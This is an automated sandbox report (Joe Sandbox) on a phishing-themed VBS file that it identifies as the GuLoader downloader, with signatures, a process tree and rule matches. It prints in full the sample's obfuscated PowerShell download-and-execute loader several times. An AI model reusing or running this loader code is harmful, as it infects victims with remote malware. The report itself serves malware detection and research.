Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs

Overview

General Information

Sample name:Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
Analysis ID:1538491
MD5:74bea39444aaab616939adfb22141173
SHA1:68146894fedfe6a2c68fdbecfc6b26ce98c164e8
SHA256:116129cfa708ab230b404febfa3a41c86c226849d41dde4120372d38c527be2d
Tags:vbsuser-lowmal3
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7460 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7572 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 8028 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2865648783.0000000008A40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.2850277699.0000000005F1A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000007.00000002.2865783140.00000000095EB000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000002.1704308297.000001DE999BE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7660JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_7660.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_8028.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc427:$b2: ::FromBase64String(
              • 0xb48d:$s1: -join
              • 0x4c39:$s4: +=
              • 0x4cfb:$s4: +=
              • 0x8f22:$s4: +=
              • 0xb03f:$s4: +=
              • 0xb329:$s4: +=
              • 0xb46f:$s4: +=
              • 0x1539a:$s4: +=
              • 0x1541a:$s4: +=
              • 0x154e0:$s4: +=
              • 0x15560:$s4: +=
              • 0x15736:$s4: +=
              • 0x157ba:$s4: +=
              • 0xbcba:$e4: Get-WmiObject
              • 0xbea9:$e4: Get-Process
              • 0xbf01:$e4: Start-Process
              • 0x16048:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Un
              Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd 